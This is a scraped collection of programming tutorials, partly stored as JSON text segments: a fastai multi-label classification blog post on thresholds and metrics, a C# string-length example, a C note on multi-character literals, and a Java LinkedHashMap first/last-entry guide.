obtain the best of these metrics. 5. Using the recorded thresholds for each class obtained from 4, convert the probability distribution into a discrete one and find the overall accuracy of the multi-label classifier. If we were to make a comparison, individual class/label’s threshold tuning with the bestAccuracy strategy for each class gave us slight jump in accuracy over the global thresholding which also gave us a slight jump as against the default threshold of 0.5 which is commonly used in all classification problems. Multi-label classifier (MLC) can tag a given datapoint with multiple classes/labels.The activation used in MLC is sigmoid not softmax.Loss function used for MLC is BinaryCrossEntropy not CrossEntropy.A good threshold can make a significant difference in getting better/worse accuracy for an MLC.During model evaluation, accuracy may not be the gold standard and metrics such as recall/precision/f1-score will be useful especially when there’s class imbalance when training the model. Multi-label classifier (MLC) can tag a given datapoint with multiple classes/labels. The activation used in MLC is sigmoid not softmax. Loss function used for MLC is BinaryCrossEntropy not CrossEntropy. A good threshold can make a significant difference in getting better/worse accuracy for an MLC. During model evaluation, accuracy may not be the gold standard and metrics such as recall/precision/f1-score will be useful especially when there’s class imbalance when training the model. I hope you enjoyed reading through this blog-post! I would be glad to connect with you on Twitter. If you have any comments/suggestions/thoughts, feel free to comment below or reach out to me on Twitter. If you liked what you read, feel free to check out my other posts here. wandb fastbook sessions linkGithub code for the application created in the postA good explanation of evaluation metrics wandb fastbook sessions link Github code for the application created in the post A good explanation of evaluation metrics
[ { "code": null, "e": 267, "s": 172, "text": "IntroductionThe DatasetModel, Activation Function and LossModel EvaluationConclusionReferences" }, { "code": null, "e": 280, "s": 267, "text": "Introduction" }, { "code": null, "e": 292, "s": 280, "text": "The Dataset" }, { "code": null, "e": 328, "s": 292, "text": "Model, Activation Function and Loss" }, { "code": null, "e": 345, "s": 328, "text": "Model Evaluation" }, { "code": null, "e": 356, "s": 345, "text": "Conclusion" }, { "code": null, "e": 367, "s": 356, "text": "References" }, { "code": null, "e": 568, "s": 367, "text": "Many a time we come across images which have multiple objects of interest in them which we wish to identify. For instance, in the following image we can see that we have both a chair and a tv monitor." }, { "code": null, "e": 782, "s": 568, "text": "To solve the above problem, we need to be able to detect multiple classes/labels in a given image. This is what multi-label classification is. Given an image, categorize it into more than one class/label/category." }, { "code": null, "e": 1274, "s": 782, "text": "Since fastai is a very convenient wrapper around Pytorch, there's very little that we will have to change from the perspective of code but the logic behind solving this problem will be somewhat different. We cannot just use our regular softmax activation with cross-entropy loss function; also the evaluation bit here is much more involved than that of a single-label classification problem. We shall discuss every bit in detail in the following sections. Let's first begin with the dataset." }, { "code": null, "e": 1439, "s": 1274, "text": "We will be using the PASCAL_2007 dataset for this task. This is a dataset which contains 20 labels in all and mind the fact that one image can have multiple labels!" }, { "code": null, "e": 1591, "s": 1439, "text": "Simply use fastai’s untar_data to download the dataset to your disk. It will be stored in a special directory called .fastai at your home/root location" }, { "code": null, "e": 1658, "s": 1591, "text": "from fastai.vision.all import *path = untar_data(URLs.PASCAL_2007)" }, { "code": null, "e": 1747, "s": 1658, "text": "If we look at the stats from a label POV for our train dataset, we obtain the following." }, { "code": null, "e": 1946, "s": 1747, "text": "From the above figure we can see that “person” is a highly recurring category in the train dataset and other categories are more or less equally represented. So, we have an imbalance in our dataset." }, { "code": null, "e": 2416, "s": 1946, "text": "Another interesting thing to note is that the sum of label counts is not the same as number of data points. In single label this used to be true because every image had one and only one label but in case of a multi-label classifier, since each datapoint is not bound to have only one object, it is worth noting that there can be more labels than number of images. This will lead us to change our strategy for building classifiers as against single-label classification." }, { "code": null, "e": 2883, "s": 2416, "text": "In this dataset, we’re given the labels in the form of a dataframe and not in a folder structure, same as in Imagenet. So we’ll have to read each entry from the dataframe and define getter methods to retrieve the values of input and output. Also, the split is defined using a column in the dataframe called is_valid. We shall define a custom function that provides the splits i.e. indices of the train and validation set separately for all the points in our dataset." }, { "code": null, "e": 2914, "s": 2883, "text": "In code, this looks as follows" }, { "code": null, "e": 3347, "s": 2914, "text": "Now, we can define a dataloader once we have the proper getters for the three main tasks i.e. getting dependent & independent variable and how to split them into train and validation files. Unlike single label classification tasks, for this task, we will have to use the MultiCategoryBlock in order to read our dependent variables as one-hot encoded vectors. The rest of the loading remains the same. We can load the data as follows" }, { "code": null, "e": 3500, "s": 3347, "text": "Our independent variable is an Image hence ImageBlock as input followed by a MultiCategoryBlock for one-hot encoding and loading the dependent variable." }, { "code": null, "e": 3655, "s": 3500, "text": "Our splitter is defined above which takes the is_valid column from our dataframe and based on that boolean variable separates train and validation entries" }, { "code": null, "e": 3760, "s": 3655, "text": "The get_x function reads the column fname the filename and appends the base path to the file for loading" }, { "code": null, "e": 3922, "s": 3760, "text": "The get_y function reads the column labels from the dataframe and since our labels are space separated, it splits the labels string by using the space delimiter." }, { "code": null, "e": 4204, "s": 3922, "text": "item_tfms and batch_tfms: We use the presizing trick from fastai to avoid lossy image cropping (like padded borders etc.) and standard augmentation methods followed by a Normalization using the imagenet_stats as we would be using a pretrained resnet50 for this classification task." }, { "code": null, "e": 4343, "s": 4204, "text": "Now, if we look at an example of a batch, we can observe the following. Look at how we have multiple labels in images from these examples." }, { "code": null, "e": 4537, "s": 4343, "text": "Although using the fast.ai API to define the model and loss is pretty straightforward, we should pause for a bit and look at the Loss Function and model, especially the loss function in detail." }, { "code": null, "e": 4677, "s": 4537, "text": "There are several changes which we are going to do toward the model head. We are not going to use softmax as before but sigmoid activation." }, { "code": null, "e": 4977, "s": 4677, "text": "What softmax does is it will transform the logits coming from the final classification linear layer to always sum up to 1. What this means for multi-label classification is that we would incur high losses when we encounter examples having multiple labels. Consider the following scenario for example" }, { "code": null, "e": 5426, "s": 4977, "text": "We see that for this hypothetical example, the datapoint actually belongs to class 1 and 4 but the best our softmax can do is push the probability scores of these two classes to 0.5 and that of the remaining two to be 0 but no better than this. This is because probabilities must always sum to 1. Imagine if it were a three class example, then the best softmax could do is push the three probability scores to 0.33 and that of the remaining 1 to 0." }, { "code": null, "e": 5465, "s": 5426, "text": "Now, let’s look at Sigmoid Activation." }, { "code": null, "e": 5622, "s": 5465, "text": "Now, we see that the activation function doesn’t care what the other labels are. It is only focussed on the logit for the label in question, unlike softmax." }, { "code": null, "e": 5708, "s": 5622, "text": "The logits are all decoupled and do not impact amongst themselves as against softmax." }, { "code": null, "e": 5891, "s": 5708, "text": "This is why in the figure above you can see that the Sigmoid activation probabilities for classes 1 and 3 can climb high to approach 1 and the other two can approach 0 independently." }, { "code": null, "e": 6038, "s": 5891, "text": "Now, you can appreciate better why we cannot use the softmax activation function but need a separate sigmoid activation function for this problem." }, { "code": null, "e": 6142, "s": 6038, "text": "Since we have changed the activation function, we ought to reconsider our choice for the loss function." }, { "code": null, "e": 6233, "s": 6142, "text": "For single label classification, we use the cross entropy loss function defined as follows" }, { "code": null, "e": 6308, "s": 6233, "text": "where ti is the true value and pi is the probability predicted for a label" }, { "code": null, "e": 6562, "s": 6308, "text": "If we continue applying this loss function to our sigmoid activated outputs, we’re in trouble. We will not then be penalizing anything where the ground truth label is 0. For the same example above, if we compute the CE loss we see the picture as follows" }, { "code": null, "e": 6624, "s": 6562, "text": "On the other hand, Binary Cross Entropy is defined as follows" }, { "code": null, "e": 6699, "s": 6624, "text": "where ti is the true value and pi is the probability predicted for a label" }, { "code": null, "e": 7114, "s": 6699, "text": "Now this is really interesting. It makes sure that whatever the label (0/1) some loss will always come to penalize the model for bad predictions. It will never be zero. Where ground truth is 1, the loss will be -log(p) and where it’s 0, the loss would be log(1-p). This would be very useful for the model to individually penalize the model via the different neurons in the classifier head for their mispredictions." }, { "code": null, "e": 7325, "s": 7114, "text": "In the image above, we can see how even when the ground truth label is 0, we are getting finite loss values for those neurons as well as against plain cross-entropy loss employed in single-label classification." }, { "code": null, "e": 7432, "s": 7325, "text": "For model, we can still continue using our imagenet pretrained backbones and start with transfer learning." }, { "code": null, "e": 7537, "s": 7432, "text": "Why the same model even if the task is different -Single Label as opposed to Multi label Classification?" }, { "code": null, "e": 8070, "s": 7537, "text": "Although in the end we have to predict multiple labels per output, we still can make use of the same filters which were pretrained to identify humans, animals, objects etc. that were a part of the big imagenet dataset. The pretrained backbone which has intelligently learned these 1000 classes has filters which could detect faces of humans, fur of cats, tails of dogs etc. and similar classes are also present in the PASCAL_2007 dataset. Hence it makes sense to start with this as the anchor point to leverage what we already have!" }, { "code": null, "e": 8164, "s": 8070, "text": "So, we are now in a position to define a fastai learner to do the training. It is as follows:" }, { "code": null, "e": 8244, "s": 8164, "text": "learn = cnn_learner(dls, resnet50, metrics=partial(accuracy_multi, thresh=0.5))" }, { "code": null, "e": 8494, "s": 8244, "text": "Here we have changed the metrics to use accuracy_multi instead of plain old accuracy. We will discuss this in detail in model evaluation but apart from that we haven’t changed anything from when we were doing Single label classification, or have we?" }, { "code": null, "e": 8689, "s": 8494, "text": "Under the hood, fastai selects BCE loss because we have specified in the dls, our dependent variable is a MultiCategoryBlock. We can explicitly specify it but we need to be aware of it at least." }, { "code": null, "e": 8784, "s": 8689, "text": "Then the training and lr_find and other things remain the same as shown in the following snip." }, { "code": null, "e": 8882, "s": 8784, "text": "This is the most important part as this is considerably different for multi-label classification." }, { "code": null, "e": 8915, "s": 8882, "text": "Firstly, what is accuracy_multi?" }, { "code": null, "e": 9136, "s": 8915, "text": "In case of multi-label classification, our targets are one-hot encoded. Also the outputs that we get are of the same shape as the targets but they're logits. So we apply sigmoid activation on those and get probabilities." }, { "code": null, "e": 9650, "s": 9136, "text": "In single label classification, we were comparing only one label for a datapoint and if it matches, our result is accurate otherwise it isn’t. However, for multi-label classification, for every datapoint, we predict a vector and the output is also a vector. So we need to compare these vectors instead of a single scalar for every datapoint. Since we have to compare multiple values, and then take an average across these comparisons; hence the name accuracy_multi. The following table will summarize this better." }, { "code": null, "e": 9699, "s": 9650, "text": "Predictions -> Probabilities to Presence/Absence" }, { "code": null, "e": 10040, "s": 9699, "text": "As we saw in the example above, we assumed predictions as a binary field but the neural network by itself does not give us a discrete value for each class/label. It gives us an array of floats which we need to convert into a probability distribution and subsequently into a discrete value representing the presence/absence of a class/label." }, { "code": null, "e": 10275, "s": 10040, "text": "First part is simple and we have covered it i.e. going from logits that are output from the neural network to a probability distribution only involves applying a sigmoid activation to the probability values for the respective classes." }, { "code": null, "e": 10576, "s": 10275, "text": "For the next part i.e. converting probability into a discrete value; we have to do thresholding. What this means is we select a probability value and we use that as a pivot to convert the continuous probabilities into discrete distributions. The following example will explain this phenomenon better." }, { "code": null, "e": 10987, "s": 10576, "text": "As seen in the image, we first take the network outputs and apply sigmoid activation which gives us the probability. Next, we arbitrarily pick 5 thresholds [0.1, 0.3, 0.5, 0.7, 0.9]. Now, what we do is compare these probabilities against the thresholds. When probability > threshold we mark it as True and False otherwise. Then taking an average across the predictions gives us the accuracy for that datapoint." }, { "code": null, "e": 11168, "s": 10987, "text": "In single label classification, the accuracy for a single datapoint can be either 0 or 1 whereas in multi-label it could be a continuous value between 0 and 1 inclusive of the two." }, { "code": null, "e": 11579, "s": 11168, "text": "Now, since we’re talking about thresholds it becomes important for us during evaluation to figure out what threshold is the best. Also, currently we’re using the same threshold for all the classes/labels. We can tune the threshold over each class separately to come up with a best score for each class and then use those thresholds to get the multi-accuracy across the entire dataset. Let’s see how to do that." }, { "code": null, "e": 11850, "s": 11579, "text": "What we did above could be in some sense called Global Thresholding where we used a threshold for all the classes, compared the accuracy for each datapoint, came up with a plot which compares accuracy against the threshold and pick the one which gives the best accuracy." }, { "code": null, "e": 11884, "s": 11850, "text": "Here’s how we could do it in code" }, { "code": null, "e": 12234, "s": 11884, "text": "This function above gives us the best accuracy point and the threshold at which it occurred which could be simply saved as a artefact with the model and during inference, when we wanna get predictions for individual labels, we can compare their probabilities against this threshold and get the discrete results to denote presence/absence of a class." }, { "code": null, "e": 12261, "s": 12234, "text": "However, we can do better." }, { "code": null, "e": 12515, "s": 12261, "text": "In practise, accuracy is not always the best evaluation metric. For eg. in a world where there’s only let’s hypothetically say 1% people who are rich, predicting every person to be poor no matter what will make you 99% accurate, but is that really good?" }, { "code": null, "e": 13042, "s": 12515, "text": "No, right? When you create a classifier where there’s heavy class imbalance, you want your performance to be good across all classes and not just one or two classes which are very highly dominant in your dataset. Accuracy cannot tell us such information. Here, having other metrics like Precision, Recall/TPR, FPR, f1-score etc. become very useful. This post is not meant to deep-dive into these metrics but let's take a cursory glance at them and I will provide good resources at the end to delve deep into each one of those." }, { "code": null, "e": 13260, "s": 13042, "text": "Precision: This quantity basically tells you of all those examples which are predicted to be of a certain type, how many were actually of that type. If we look at the confusion matrix above, we can define Precision as" }, { "code": null, "e": 13466, "s": 13260, "text": "Recall/TPR: This quantity basically specifies how many examples of a particular category were properly identified by the classifier. It is also called as True Positive Rate or TPR for short. It is given by" }, { "code": null, "e": 13823, "s": 13466, "text": "f1-score: When we're defining a classifier, we want the two to be as high as possible and ideally to be 1 but they're kind of both inversely related to one another. Hence we define a metric which finds the point where they're both best balanced. This is the f1-score which is in principle a harmonic mean between the recall and precision defined as follows" }, { "code": null, "e": 13923, "s": 13823, "text": "FPR: False positive rate is the number of negative examples which are misclassified. It is given by" }, { "code": null, "e": 14413, "s": 13923, "text": "The evaluation of a classifier can be done on several grounds. For some accuracy could still be the gold standard of evaluation; for some others, f1-score might be an important figure to ensure the classifier performance across multiple categories. In many cases, the ROC or receiver operating characteristics plot could be used to figure out the classifier performance. We will evaluate our model using all the three techniques to get the best performing model given a specific criterion." }, { "code": null, "e": 14517, "s": 14413, "text": "A graph of ROC for bus category from the PASCAL_2007 datset on which we trained our model is as follows" }, { "code": null, "e": 15011, "s": 14517, "text": "On the X-axis we have FPR and on the Y-axis we have Recall/TPR. We need to identify the point where the TPR is as high as possible without the FPR increasing. We can figure this out by finding the point which is closest to (0, 1) point i.e. where FPR is 0 and TPR is 1. This is shown in the curve with the red dot. For a perfect classifier, we should have a unit-rectangle kind of a graph but practically the distributions of the two classes are never completely distinguishable in most cases." }, { "code": null, "e": 15257, "s": 15011, "text": "The complete code to do this will become very large but it is available on GitHub which I have attached in the references section. I will sketch out the pseudo-code for doing this local thresholding and then final aggregation of the predictions." }, { "code": null, "e": 15314, "s": 15257, "text": "1. Get the predictions & targets from the fastai learner" }, { "code": null, "e": 15553, "s": 15314, "text": "2. Separate out the predictions and targets for each and every label. The fastai predictions would be of shape `N_EXAMPLES x N_CLASSES`, so break them into N_CLASSES vectors of length `N_EXAMPLES` each. Similarly do this with the targets." }, { "code": null, "e": 15717, "s": 15553, "text": "3. Select a range of thresholds and evaluate the metrics precision, recall, fpr, f1-score for all the examples of each class/label and construct the ROC-AUC Curve." }, { "code": null, "e": 15937, "s": 15717, "text": "4. Select the closest point, best accuracy and best f1-score points amongst all those points over which you varied the threshold. Record the threshold for each of those points where you obtain the best of these metrics." }, { "code": null, "e": 16120, "s": 15937, "text": "5. Using the recorded thresholds for each class obtained from 4, convert the probability distribution into a discrete one and find the overall accuracy of the multi-label classifier." }, { "code": null, "e": 16430, "s": 16120, "text": "If we were to make a comparison, individual class/label’s threshold tuning with the bestAccuracy strategy for each class gave us slight jump in accuracy over the global thresholding which also gave us a slight jump as against the default threshold of 0.5 which is commonly used in all classification problems." }, { "code": null, "e": 16914, "s": 16430, "text": "Multi-label classifier (MLC) can tag a given datapoint with multiple classes/labels.The activation used in MLC is sigmoid not softmax.Loss function used for MLC is BinaryCrossEntropy not CrossEntropy.A good threshold can make a significant difference in getting better/worse accuracy for an MLC.During model evaluation, accuracy may not be the gold standard and metrics such as recall/precision/f1-score will be useful especially when there’s class imbalance when training the model." }, { "code": null, "e": 16999, "s": 16914, "text": "Multi-label classifier (MLC) can tag a given datapoint with multiple classes/labels." }, { "code": null, "e": 17050, "s": 16999, "text": "The activation used in MLC is sigmoid not softmax." }, { "code": null, "e": 17117, "s": 17050, "text": "Loss function used for MLC is BinaryCrossEntropy not CrossEntropy." }, { "code": null, "e": 17213, "s": 17117, "text": "A good threshold can make a significant difference in getting better/worse accuracy for an MLC." }, { "code": null, "e": 17402, "s": 17213, "text": "During model evaluation, accuracy may not be the gold standard and metrics such as recall/precision/f1-score will be useful especially when there’s class imbalance when training the model." }, { "code": null, "e": 17606, "s": 17402, "text": "I hope you enjoyed reading through this blog-post! I would be glad to connect with you on Twitter. If you have any comments/suggestions/thoughts, feel free to comment below or reach out to me on Twitter." }, { "code": null, "e": 17678, "s": 17606, "text": "If you liked what you read, feel free to check out my other posts here." }, { "code": null, "e": 17798, "s": 17678, "text": "wandb fastbook sessions linkGithub code for the application created in the postA good explanation of evaluation metrics" }, { "code": null, "e": 17827, "s": 17798, "text": "wandb fastbook sessions link" }, { "code": null, "e": 17879, "s": 17827, "text": "Github code for the application created in the post" } ]
How to calculate the length of the string using C#?
Use the String.Length property in C# to get the length of the string. str.Length The property calculates the words in the string and displays the length of the specified string, for example, the string Amit has 4 characters − string str = "Amit"; The following is the C# program to calculate the string length − Live Demo using System; using System.Collections; namespace Demo { class Program { static void Main(string[] args) { string str = "Amit"; Console.WriteLine("String: "+str); Console.WriteLine("String Length: "+str.Length); Console.ReadKey(); } } } String: Amit String Length: 4
[ { "code": null, "e": 1132, "s": 1062, "text": "Use the String.Length property in C# to get the length of the string." }, { "code": null, "e": 1143, "s": 1132, "text": "str.Length" }, { "code": null, "e": 1288, "s": 1143, "text": "The property calculates the words in the string and displays the length of the specified string, for example, the string Amit has 4 characters −" }, { "code": null, "e": 1309, "s": 1288, "text": "string str = \"Amit\";" }, { "code": null, "e": 1374, "s": 1309, "text": "The following is the C# program to calculate the string length −" }, { "code": null, "e": 1385, "s": 1374, "text": " Live Demo" }, { "code": null, "e": 1681, "s": 1385, "text": "using System;\nusing System.Collections;\n\nnamespace Demo {\n\n class Program {\n\n static void Main(string[] args) {\n\n string str = \"Amit\";\n\n Console.WriteLine(\"String: \"+str);\n Console.WriteLine(\"String Length: \"+str.Length);\n Console.ReadKey();\n }\n }\n}" }, { "code": null, "e": 1711, "s": 1681, "text": "String: Amit\nString Length: 4" } ]
Assigning multiple characters in an int in C language
The character type data is stored by its ASCII value internally in C or C++. If we want to print a single character as integer, we will get the ASCII value. But when we are trying to print more than one character using a single quote, then it will print some strange output. Please check the following program to get the idea. #include <stdio.h> int main() { printf("%d\n", 'A'); printf("%d\n", 'AA'); printf("%d\n", 'ABC'); } 65 16705 4276803 The ASCII of A is 65. So at first it is showing 65 (01000001). Now for AA, it is showing 16705. This is ASCII of 6565 (01000001 01000001) = 16705. For third the value is ABC (01000001 01000010 01000011) = 4276803.
[ { "code": null, "e": 1337, "s": 1062, "text": "The character type data is stored by its ASCII value internally in C or C++. If we want to print a single character as integer, we will get the ASCII value. But when we are trying to print more than one character using a single quote, then it will print some strange output." }, { "code": null, "e": 1389, "s": 1337, "text": "Please check the following program to get the idea." }, { "code": null, "e": 1498, "s": 1389, "text": "#include <stdio.h>\nint main() {\n printf(\"%d\\n\", 'A');\n printf(\"%d\\n\", 'AA');\n printf(\"%d\\n\", 'ABC');\n}" }, { "code": null, "e": 1515, "s": 1498, "text": "65\n16705\n4276803" }, { "code": null, "e": 1729, "s": 1515, "text": "The ASCII of A is 65. So at first it is showing 65 (01000001). Now for AA, it is showing 16705. This is ASCII of 6565 (01000001 01000001) = 16705. For third the value is ABC (01000001 01000010 01000011) = 4276803." } ]
How to Get First or Last Entry from Java LinkedHashMap? - GeeksforGeeks
09 Jun, 2021 LinkedHashMap is a predefined class in Java which is similar to HashMap, containing key and its respective value unlike HashMap, In LinkedHashMap insertion order is preserved. The task is to get the first and last entry present in LinkedHashMap. Iteration to get last and first value. The first and the last entry in Map is the entry that is inserted first and the entry that is to be inserted last where insertion order is preserved. Methods: The naive approach using the for-each loop for iteration over Map. Converting the keys of LinkedHashMap to an integer array.Converting keys in LinkedHashMap to List like ArrayList to LinkedList. The naive approach using the for-each loop for iteration over Map. Converting the keys of LinkedHashMap to an integer array. Converting keys in LinkedHashMap to List like ArrayList to LinkedList. Illustration: Input : Key- 2 : Value-5 Key- 14 : Value-35 Key- 31 : Value-20 Key- 36 : Value-18 Key- 52 : Value-6 Output: Key Value First-> 2 5 Last -> 52 6 Method 1: Naive approach using the for-each loop for iteration over Map. Construct function getFirst() and getLast() getFirst() print the first entry getLast() move to last entry (index is equal to size of LinkedHashMap) Example: Java // Java Program to get first or last entry// from Java LinkedHashMap // Importing all class of// java.util packageimport java.util.*;// Importing java input/output classesimport java.io.*; class GFG { // getLast() method public static void getLast(LinkedHashMap<Integer, Integer> lhm) { int count = 1; for (Map.Entry<Integer, Integer> it : lhm.entrySet()) { if (count == lhm.size()) { System.out.println("Last Key-> "+it.getKey()); System.out.println("Last Value-> "+it.getValue()); return; } count++; } } // getFirst() method to get first element from // java LinkedHashMap public static void getFirst(LinkedHashMap<Integer, Integer> lhm) { int count = 1; for (Map.Entry<Integer, Integer> it : lhm.entrySet()) { if (count == 1) { System.out.println("First Key-> "+it.getKey()); System.out.println("First Value-> "+it.getValue()); return; } count++; } } // Main driver method public static void main(String[] args) { // Creating(defining) a LinkedHashMap LinkedHashMap<Integer, Integer> LHM = new LinkedHashMap<>(); // Adding elements to above LinkedHashMap LHM.put(2, 5); LHM.put(14, 35); LHM.put(36, 20); LHM.put(34, 18); LHM.put(52, 6); // Calling getFirst() method in main() getFirst(LHM); // Calling getLast() method in main() getLast(LHM); }} First Key-> 2 First Value-> 5 Last Key-> 52 Last Value-> 6 Time complexity: O(n) Method 2: Converting the keys of LinkedHashMap to an integer array. Algorithm: Getting first and value corresponding to the key. Printing last and value corresponding to the key. Pseudo Code : Integer[] aKeys = LHM.keySet().toArray(new Integer[LHM.size()]); // where LHM is name of LinkedHashMap created and aKeys of array to be converted. Example: Java // Java Program to get first or last entry// from Java LinkedHashMap// By converting Map to integer array // Importing all class of// java.util packageimport java.util.*;// Importing java input/output classesimport java.io.*; class GFG { // Main driver method public static void main(String[] args) { // Creating a LinkedHashMAp LinkedHashMap<Integer, Integer> LHM = new LinkedHashMap<>(); // Adding. elements to above LinkedHashMap // Custom inputs LHM.put(1, 8); LHM.put(2, 6); LHM.put(3, 7); LHM.put(4, 2); LHM.put(5, 5); // Getting all keys from the LinkedHashMap, and // converting it to an array Integer[] aKeys = LHM.keySet().toArray(new Integer[LHM.size()]); // Condition check // If array is having element // Print key and value if (aKeys.length > 0) { // Print first key and first value // From integer array System.out.println("First key-> " + aKeys[0]); System.out.println("First value-> " + LHM.get(aKeys[0])); // Print first key from integer array System.out.println("Last key-> " + aKeys[aKeys.length - 1]); // Print last value from integer array System.out.println( "Last value-> " + LHM.get(aKeys[aKeys.length - 1])); } }} First key-> 1 First value-> 8 Last key-> 5 Last value-> 5 Time Complexity: O(1) Method 3: Converting keys in LinkedHashMap to List like ArrayList to LinkedList. Algorithm Get first and the value corresponding to the key. Print last and the value corresponding to the key. Pseudo Code: List<Integer> lKeys = new ArrayList<Integer>(LHM.keySet()); // where LHM is name of LinkedHashMap and lKeys is name of List Example Java // Java Program to get first or last entry// from Java LinkedHashMap// By converting Map to List // Importing all class of// java.util packageimport java.util.*;// Importing java input/output classesimport java.io.*; // Main classclass GFG { // Main driver method public static void main(String[] args) { // Creating a LinkedHashMapc LinkedHashMap<Integer, Integer> LHM = new LinkedHashMap<>(); // Adding elements to above LinkedHashMap // Custom inputs LHM.put(1, 8); LHM.put(2, 6); LHM.put(3, 7); LHM.put(4, 2); LHM.put(5, 5); // Creating a List List<Integer> lKeys = new ArrayList<Integer>(LHM.keySet()); // Condition check // If there is single element in List // Print key and value if (lKeys.size() > 0) { // Print first key form List System.out.println("First key: " + lKeys.get(0)); // Print first value from List System.out.println("First value: " + LHM.get(lKeys.get(0))); // Print last key from List System.out.println( "Last key: " + lKeys.get(lKeys.size() - 1)); // Print last value from List System.out.println( "Last value: " + LHM.get(lKeys.get(lKeys.size() - 1))); } }} First key: 1 First value: 8 Last key: 5 Last value: 5 Time Complexity: O(1) anikaseth98 Java-LinkedHashMap Picked Technical Scripter 2020 Java Java Programs Technical Scripter Java Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here. Comments Old Comments Hashtable in Java Constructors in Java Different ways of Reading a text file in Java Comparator Interface in Java with Examples Java Math random() method with Examples Convert a String to Character array in Java Java Programming Examples Convert Double to Integer in Java Implementing a Linked List in Java using Class How to Iterate HashMap in Java?
[ { "code": null, "e": 23557, "s": 23529, "text": "\n09 Jun, 2021" }, { "code": null, "e": 23993, "s": 23557, "text": "LinkedHashMap is a predefined class in Java which is similar to HashMap, containing key and its respective value unlike HashMap, In LinkedHashMap insertion order is preserved. The task is to get the first and last entry present in LinkedHashMap. Iteration to get last and first value. The first and the last entry in Map is the entry that is inserted first and the entry that is to be inserted last where insertion order is preserved. " }, { "code": null, "e": 24002, "s": 23993, "text": "Methods:" }, { "code": null, "e": 24197, "s": 24002, "text": "The naive approach using the for-each loop for iteration over Map. Converting the keys of LinkedHashMap to an integer array.Converting keys in LinkedHashMap to List like ArrayList to LinkedList." }, { "code": null, "e": 24265, "s": 24197, "text": "The naive approach using the for-each loop for iteration over Map. " }, { "code": null, "e": 24323, "s": 24265, "text": "Converting the keys of LinkedHashMap to an integer array." }, { "code": null, "e": 24394, "s": 24323, "text": "Converting keys in LinkedHashMap to List like ArrayList to LinkedList." }, { "code": null, "e": 24408, "s": 24394, "text": "Illustration:" }, { "code": null, "e": 24416, "s": 24408, "text": "Input :" }, { "code": null, "e": 24434, "s": 24416, "text": "Key- 2 : Value-5" }, { "code": null, "e": 24453, "s": 24434, "text": "Key- 14 : Value-35" }, { "code": null, "e": 24472, "s": 24453, "text": "Key- 31 : Value-20" }, { "code": null, "e": 24491, "s": 24472, "text": "Key- 36 : Value-18" }, { "code": null, "e": 24509, "s": 24491, "text": "Key- 52 : Value-6" }, { "code": null, "e": 24517, "s": 24509, "text": "Output:" }, { "code": null, "e": 24531, "s": 24517, "text": "Key Value" }, { "code": null, "e": 24552, "s": 24531, "text": "First-> 2 5" }, { "code": null, "e": 24573, "s": 24552, "text": "Last -> 52 6" }, { "code": null, "e": 24647, "s": 24573, "text": "Method 1: Naive approach using the for-each loop for iteration over Map. " }, { "code": null, "e": 24691, "s": 24647, "text": "Construct function getFirst() and getLast()" }, { "code": null, "e": 24724, "s": 24691, "text": "getFirst() print the first entry" }, { "code": null, "e": 24795, "s": 24724, "text": "getLast() move to last entry (index is equal to size of LinkedHashMap)" }, { "code": null, "e": 24804, "s": 24795, "text": "Example:" }, { "code": null, "e": 24809, "s": 24804, "text": "Java" }, { "code": "// Java Program to get first or last entry// from Java LinkedHashMap // Importing all class of// java.util packageimport java.util.*;// Importing java input/output classesimport java.io.*; class GFG { // getLast() method public static void getLast(LinkedHashMap<Integer, Integer> lhm) { int count = 1; for (Map.Entry<Integer, Integer> it : lhm.entrySet()) { if (count == lhm.size()) { System.out.println(\"Last Key-> \"+it.getKey()); System.out.println(\"Last Value-> \"+it.getValue()); return; } count++; } } // getFirst() method to get first element from // java LinkedHashMap public static void getFirst(LinkedHashMap<Integer, Integer> lhm) { int count = 1; for (Map.Entry<Integer, Integer> it : lhm.entrySet()) { if (count == 1) { System.out.println(\"First Key-> \"+it.getKey()); System.out.println(\"First Value-> \"+it.getValue()); return; } count++; } } // Main driver method public static void main(String[] args) { // Creating(defining) a LinkedHashMap LinkedHashMap<Integer, Integer> LHM = new LinkedHashMap<>(); // Adding elements to above LinkedHashMap LHM.put(2, 5); LHM.put(14, 35); LHM.put(36, 20); LHM.put(34, 18); LHM.put(52, 6); // Calling getFirst() method in main() getFirst(LHM); // Calling getLast() method in main() getLast(LHM); }}", "e": 26445, "s": 24809, "text": null }, { "code": null, "e": 26504, "s": 26445, "text": "First Key-> 2\nFirst Value-> 5\nLast Key-> 52\nLast Value-> 6" }, { "code": null, "e": 26526, "s": 26504, "text": "Time complexity: O(n)" }, { "code": null, "e": 26594, "s": 26526, "text": "Method 2: Converting the keys of LinkedHashMap to an integer array." }, { "code": null, "e": 26606, "s": 26594, "text": "Algorithm: " }, { "code": null, "e": 26656, "s": 26606, "text": "Getting first and value corresponding to the key." }, { "code": null, "e": 26706, "s": 26656, "text": "Printing last and value corresponding to the key." }, { "code": null, "e": 26867, "s": 26706, "text": "Pseudo Code :\nInteger[] aKeys = LHM.keySet().toArray(new Integer[LHM.size()]);\n// where LHM is name of LinkedHashMap created and aKeys of array to be converted." }, { "code": null, "e": 26877, "s": 26867, "text": "Example: " }, { "code": null, "e": 26882, "s": 26877, "text": "Java" }, { "code": "// Java Program to get first or last entry// from Java LinkedHashMap// By converting Map to integer array // Importing all class of// java.util packageimport java.util.*;// Importing java input/output classesimport java.io.*; class GFG { // Main driver method public static void main(String[] args) { // Creating a LinkedHashMAp LinkedHashMap<Integer, Integer> LHM = new LinkedHashMap<>(); // Adding. elements to above LinkedHashMap // Custom inputs LHM.put(1, 8); LHM.put(2, 6); LHM.put(3, 7); LHM.put(4, 2); LHM.put(5, 5); // Getting all keys from the LinkedHashMap, and // converting it to an array Integer[] aKeys = LHM.keySet().toArray(new Integer[LHM.size()]); // Condition check // If array is having element // Print key and value if (aKeys.length > 0) { // Print first key and first value // From integer array System.out.println(\"First key-> \" + aKeys[0]); System.out.println(\"First value-> \" + LHM.get(aKeys[0])); // Print first key from integer array System.out.println(\"Last key-> \" + aKeys[aKeys.length - 1]); // Print last value from integer array System.out.println( \"Last value-> \" + LHM.get(aKeys[aKeys.length - 1])); } }}", "e": 28361, "s": 26882, "text": null }, { "code": null, "e": 28419, "s": 28361, "text": "First key-> 1\nFirst value-> 8\nLast key-> 5\nLast value-> 5" }, { "code": null, "e": 28441, "s": 28419, "text": "Time Complexity: O(1)" }, { "code": null, "e": 28522, "s": 28441, "text": "Method 3: Converting keys in LinkedHashMap to List like ArrayList to LinkedList." }, { "code": null, "e": 28533, "s": 28522, "text": "Algorithm " }, { "code": null, "e": 28583, "s": 